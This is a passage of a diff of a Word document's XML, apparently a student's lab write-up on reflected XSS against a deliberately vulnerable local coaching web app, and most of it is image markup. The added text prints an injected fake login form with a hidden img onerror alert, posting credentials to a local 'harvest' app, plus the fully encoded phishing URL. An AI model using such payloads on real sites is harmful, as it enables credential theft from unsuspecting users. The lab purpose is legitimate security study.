+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                    <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:nvPicPr>
+                        <pic:cNvPr id="1299871594" name=""/>
+                        <pic:cNvPicPr>
+                          <a:picLocks noChangeAspect="1"/>
+                        </pic:cNvPicPr>
+                        <pic:nvPr/>
+                      </pic:nvPicPr>
+                      <pic:blipFill rotWithShape="1">
+                        <a:blip r:embed="rId33"/>
+                        <a:stretch/>
+                      </pic:blipFill>
+                      <pic:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="6858000" cy="1208551"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                      </pic:spPr>
+                    </pic:pic>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+                <v:stroke joinstyle="miter"/>
+                <v:formulas>
+                  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+                  <v:f eqn="sum @0 1 0"/>
+                  <v:f eqn="sum 0 0 @1"/>
+                  <v:f eqn="prod @2 1 2"/>
+                  <v:f eqn="prod @3 21600 pixelWidth"/>
+                  <v:f eqn="prod @3 21600 pixelHeight"/>
+                  <v:f eqn="sum @0 0 1"/>
+                  <v:f eqn="prod @6 1 2"/>
+                  <v:f eqn="prod @7 21600 pixelWidth"/>
+                  <v:f eqn="sum @8 21600 0"/>
+                  <v:f eqn="prod @7 21600 pixelHeight"/>
+                  <v:f eqn="sum @10 21600 0"/>
+                </v:formulas>
+                <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+                <o:lock v:ext="edit" aspectratio="t"/>
+              </v:shapetype>
+              <v:shape id="_x0000_i22" o:spid="_x0000_s22" type="#_x0000_t75" style="width:540.00pt;height:95.16pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId33" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
             </w:pict>
@@ -1814,8 +2901,6 @@
         <w:ind/>
         <w:rPr/>
       </w:pPr>
-      <w:r/>
-      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
@@ -1823,7 +2908,7 @@
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                 <wp:extent cx="6858000" cy="1117352"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:docPr id="19" name=""/>
+                <wp:docPr id="24" name=""/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                 </wp:cNvGraphicFramePr>
@@ -1838,7 +2923,7 @@
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId27"/>
+                        <a:blip r:embed="rId34"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
@@ -1877,8 +2962,8 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i18" o:spid="_x0000_s18" type="#_x0000_t75" style="width:540.00pt;height:87.98pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId27" o:title=""/>
+              <v:shape id="_x0000_i23" o:spid="_x0000_s23" type="#_x0000_t75" style="width:540.00pt;height:87.98pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId34" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
             </w:pict>
@@ -1886,6 +2971,35 @@
         </mc:AlternateContent>
       </w:r>
       <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
       <w:r/>
     </w:p>
     <w:p>
@@ -1906,8 +3020,9 @@
         <w:ind/>
         <w:rPr/>
       </w:pPr>
-      <w:r/>
-      <w:r/>
+      <w:r>
+        <w:t xml:space="preserve">And now, when I submit the form, I will be redirected to google.com once I press OK in the form that was injected.</w:t>
+      </w:r>
       <w:r/>
     </w:p>
     <w:p>
@@ -1917,30 +3032,6 @@
         <w:ind/>
         <w:rPr/>
       </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
-      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
@@ -1948,7 +3039,7 @@
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                 <wp:extent cx="6858000" cy="2985650"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:docPr id="20" name=""/>
+                <wp:docPr id="25" name=""/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                 </wp:cNvGraphicFramePr>
@@ -1963,7 +3054,7 @@
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId28"/>
+                        <a:blip r:embed="rId35"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
@@ -2002,8 +3093,8 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i19" o:spid="_x0000_s19" type="#_x0000_t75" style="width:540.00pt;height:235.09pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId28" o:title=""/>
+              <v:shape id="_x0000_i24" o:spid="_x0000_s24" type="#_x0000_t75" style="width:540.00pt;height:235.09pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId35" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
             </w:pict>
@@ -2011,7 +3102,6 @@
         </mc:AlternateContent>
       </w:r>
       <w:r/>
-      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2020,8 +3110,6 @@
         <w:ind/>
         <w:rPr/>
       </w:pPr>
-      <w:r/>
-      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
@@ -2029,7 +3117,7 @@
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                 <wp:extent cx="6858000" cy="2985650"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:docPr id="21" name=""/>
+                <wp:docPr id="26" name=""/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                 </wp:cNvGraphicFramePr>
@@ -2044,7 +3132,7 @@
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId29"/>
+                        <a:blip r:embed="rId36"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
@@ -2083,8 +3171,8 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i20" o:spid="_x0000_s20" type="#_x0000_t75" style="width:540.00pt;height:235.09pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId29" o:title=""/>
+              <v:shape id="_x0000_i25" o:spid="_x0000_s25" type="#_x0000_t75" style="width:540.00pt;height:235.09pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId36" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
             </w:pict>
@@ -2093,15 +3181,6 @@
       </w:r>
       <w:r/>
       <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r/>
       <w:r/>
       <w:r/>
     </w:p>
@@ -2110,18 +3189,17 @@
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
+        <w:jc w:val="center"/>
         <w:rPr/>
       </w:pPr>
-      <w:r/>
-      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="2123255"/>
+                <wp:extent cx="5282425" cy="1635453"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:docPr id="22" name=""/>
+                <wp:docPr id="27" name=""/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                 </wp:cNvGraphicFramePr>
@@ -2136,13 +3214,13 @@
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId30"/>
+                        <a:blip r:embed="rId37"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
-                        <a:xfrm>
+                        <a:xfrm flipH="0" flipV="0">
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6857999" cy="2123254"/>
+                          <a:ext cx="5282424" cy="1635452"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -2175,8 +3253,8 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i21" o:spid="_x0000_s21" type="#_x0000_t75" style="width:540.00pt;height:167.19pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId30" o:title=""/>
+              <v:shape id="_x0000_i26" o:spid="_x0000_s26" type="#_x0000_t75" style="width:415.94pt;height:128.78pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId37" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
             </w:pict>
@@ -2184,6 +3262,17 @@
         </mc:AlternateContent>
       </w:r>
       <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Also, note that the previous submissions here has been cleared because I restarted the web server. The attackers panel does not store them in a persistent database or JSON or anything like that. It’s all stored in memory and will get cleared when you restart the web server.</w:t>
+      </w:r>
       <w:r/>
     </w:p>
     <w:p>
@@ -2191,9 +3280,317 @@
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The first form payload was:</w:t>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing w:line="120" w:lineRule="auto"/>
+        <w:ind/>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;img src=x style="display:none" onerror="alert('You need to log in immediately!')"&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing w:line="120" w:lineRule="auto"/>
+        <w:ind/>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;h3&gt;LOGIN&lt;/h3&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing w:line="120" w:lineRule="auto"/>
+        <w:ind/>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;form action="http://localhost:8080/harvest-coachweb-springapp/validate" method="post" target="_blank"&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing w:line="120" w:lineRule="auto"/>
+        <w:ind/>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;label for="username"&gt;Username:&lt;/label&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing w:line="120" w:lineRule="auto"/>
+        <w:ind/>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;input type="text" name="username" id="username"/&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing w:line="120" w:lineRule="auto"/>
+        <w:ind/>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;label for="password"&gt;Password:&lt;/label&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing w:line="120" w:lineRule="auto"/>
+        <w:ind/>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;input type="password" name="password" id="password"/&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing w:line="120" w:lineRule="auto"/>
+        <w:ind/>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;input type="submit" value="OK"/&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing w:line="120" w:lineRule="auto"/>
+        <w:ind/>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;/form&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
         <w:rPr/>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The encoded phishing URL for the payload above is:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
       <w:r/>
+      <w:r/>
+      <w:hyperlink r:id="rId38" w:tooltip="http://localhost:8080/02-vul-coachwebapp/workout?studentName=%3Cimg+src%3Dx+style%3D%22display%3Anone%22+onerror%3D%22alert%28%27You+need+to+log+in+immediately%21%27%29%22%3E++%3Ch3%3ELOGIN%3C%2Fh3%3E++%3Cform+action%3D%22http%3A%2F%2Flocalhost%3A8080%2Fharvest-coachweb-springapp%2Fvalidate%22+method%3D%22post%22+target%3D%22_blank%22%3E++%3Clabel+for%3D%22username%22%3EUsername%3A%3C%2Flabel%3E++%3Cinput+type%3D%22text%22+name%3D%22username%22+id%3D%22username%22%2F%3E++%3Clabel+for%3D%22password%22%3EPassword%3A%3C%2Flabel%3E++%3Cinput+type%3D%22password%22+name%3D%22password%22+id%3D%22password%22%2F%3E++%3Cinput+type%3D%22submit%22+value%3D%22OK%22%2F%3E++%3C%2Fform%3E" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="874"/>
+          </w:rPr>
+          <w:t xml:space="preserve">http://localhost:8080/02-vul-coachwebapp/workout?studentName=%3Cimg+src%3Dx+style%3D%22display%3Anone%22+onerror%3D%22alert%28%27You+need+to+log+in+immediately%21%27%29%22%3E++%3Ch3%3ELOGIN%3C%2Fh3%3E++%3Cform+action%3D%22http%3A%2F%2Flocalhost%3A8080%2Fhar</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="874"/>
+          </w:rPr>
+          <w:t xml:space="preserve">vest-coachweb-springapp%2Fvalidate%22+method%3D%22post%22+target%3D%22_blank%22%3E++%3Clabel+for%3D%22username%22%3EUsername%3A%3C%2Flabel%3E++%3Cinput+type%3D%22text%22+name%3D%22username%22+id%3D%22username%22%2F%3E++%3Clabel+for%3D%22password%22%3EPasswo</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="874"/>
+          </w:rPr>
+          <w:t xml:space="preserve">rd%3A%3C%2Flabel%3E++%3Cinput+type%3D%22password%22+name%3D%22password%22+id%3D%22password%22%2F%3E++%3Cinput+type%3D%22submit%22+value%3D%22OK%22%2F%3E++%3C%2Fform%3E</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="874"/>
+          </w:rPr>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">After changing it to redirect to google, I removed the `</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">target="_blank"` section because I don’t want that tab to be opened in a new blank tab.</w:t>
+      </w:r>
       <w:r/>
       <w:r/>
     </w:p>
@@ -2202,11 +3599,357 @@
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The second udpated form payload was:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing w:line="120" w:lineRule="auto"/>
+        <w:ind/>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;img src=x style="display:none" onerror="alert('You need to log in immediately!')"&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing w:line="120" w:lineRule="auto"/>
+        <w:ind/>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;h3&gt;LOGIN&lt;/h3&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing w:line="120" w:lineRule="auto"/>
+        <w:ind/>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;form action="http://localhost:8080/harvest-coachweb-springapp/validate" method="post" target="_blank"&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing w:line="120" w:lineRule="auto"/>
+        <w:ind/>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;label for="username"&gt;Username:&lt;/label&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing w:line="120" w:lineRule="auto"/>
+        <w:ind/>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;input type="text" name="username" id="username"/&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing w:line="120" w:lineRule="auto"/>
+        <w:ind/>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;label for="password"&gt;Password:&lt;/label&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing w:line="120" w:lineRule="auto"/>
+        <w:ind/>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;input type="password" name="password" id="password"/&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing w:line="120" w:lineRule="auto"/>
+        <w:ind/>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;input type="submit" value="OK"/&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
